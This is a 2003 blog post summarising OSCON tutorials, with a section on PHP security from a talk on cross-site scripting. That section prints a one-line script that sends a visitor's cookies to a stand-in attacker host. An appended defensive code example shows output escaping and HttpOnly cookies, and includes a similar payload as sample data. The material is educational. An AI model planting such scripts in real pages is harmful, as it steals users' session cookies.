Charles Engelke's Blog

July 15, 2003

OSCON 2003 Tutorials

Filed under: Ricardo Havill — Charles Engelke @ 12:52 am
Embracing and Extending RT Tutorial

Request Tracker is a customizable trouble ticketing system written in Perl.
The fundamental entity in RT is the ticket. The definition of a ticket depends on how RT is being used. For example,
customer support requests, bugs in software or items in a to-do list could be tickets in RT. Users can interact with RT
by email or through a web browser.

Jabber Bootcamp

Jabber is an XML protocol for instant messaging and presence detection. The Jabber
protocol is officially known as XMPP (Extensible Messaging and Presence Protocol) by the IETF. It may be used
as a substitute for programs like AOL Instant Messenger and Yahoo Messenger. Uses of Jabber are not limited to
instant messaging. Other possible uses include presence detection of devices (or people), sending structured data between
clients and a content delivery system.

Network Programming in Python

Python is a high-level, object-oriented programming language. Simple client and
server applications can be written in Python much faster than in most languages used today. During his presentation,
Steve Holden demonstrated a client/server application, an SMTP client, a POP3 client, an FTP client, an HTTP client and
an HTTP server. The HTTP server was written with three lines of code. Copies of Steve’s demo programs may be downloaded
here.

Programming Web Services With PHP

This tutorial began with a description of the XML-RPC and SOAP protocols. The most important point discussed about
XML-RPC and SOAP was that XML-RPC is much easier to use and understand than SOAP. In many cases people have been
using SOAP when a simpler protocol like XML-RPC would suffice. The rest of the session consisted of
example PHP programs that used these protocols. The PHP SOAP extensions are usable, but they are not fully implemented.
More info about this tutorial is available here.

July 14, 2003

PHP Under Attack

Filed under: Ricardo Havill — Charles Engelke @ 10:15 pm

During his Thursday session at OSCON 2003, Chris Shiflett explained two types of
security vulnerabilities that may exist in a web site. The examples presented used
the PHP programming language, but these vulnerabilities may occur in CGI programs
written in any language. A copy of the presentation should be available
here.

Cross Site Scripting

Cross Site Scripting (XSS) exploits the trust a user has for a web site. It
usually involves sites that display foreign data, such as web mail applications,
web forums and guest books. XSS may be used to trick a user into executing malicious
scripts and to steal cookies. Web sites often use cookies to determine whether a
user has authorization to perform certain actions. The following JavaScript code
may be used by a hacker to steal a user’s cookies:


<script>
document.location = "http://evil-cookie-monster.org/stealcookies.cgi?cookies=" + document.cookie
</script>
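The defensive side of the guest book case above, as an added example that is not from the original post or from the talk: a renderer that writes visitor text unchanged beside one that encodes it on output, plus a session cookie marked HttpOnly so page scripts cannot read it. All function names, the sample entry and the cookie values are hypothetical, and the `Secure` attribute assumes the site is served over HTTPS.

```javascript
// Added example (hypothetical names): output encoding for a guest book page.

// Characters that let text break out of element content or a quoted attribute.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode untrusted text so the browser displays it instead of parsing it as markup.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the visitor's text is concatenated into the page unchanged.
function renderEntryUnsafe(entry) {
  return "<li><b>" + entry.name + "</b>: " + entry.message + "</li>";
}

// Hardened: every visitor-supplied field is encoded at the point of output.
function renderEntrySafe(entry) {
  return "<li><b>" + escapeHtml(entry.name) + "</b>: " +
    escapeHtml(entry.message) + "</li>";
}

// Value for a Set-Cookie header. HttpOnly keeps the cookie out of
// document.cookie, so a script that does get injected cannot read it.
// Secure is an assumption: it requires the site to be served over HTTPS.
function sessionCookieHeader(name, value) {
  return name + "=" + encodeURIComponent(value) + "; Path=/; HttpOnly; Secure";
}

// Constructed sample entry: a guest book post carrying a script element.
const sampleEntry = {
  name: "visitor",
  message: '<script>document.location = "http://example.invalid/?c=" + document.cookie</script>',
};

console.log(renderEntryUnsafe(sampleEntry)); // script element reaches the browser intact
console.log(renderEntrySafe(sampleEntry));   // same text, shown as literal characters
console.log("Set-Cookie: " + sessionCookieHeader("session", "constructed-id-123"));
```

Encoding belongs at the point of output rather than at input time, because the same stored text may later be written into contexts (HTML body, attribute, URL) that need different encodings.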
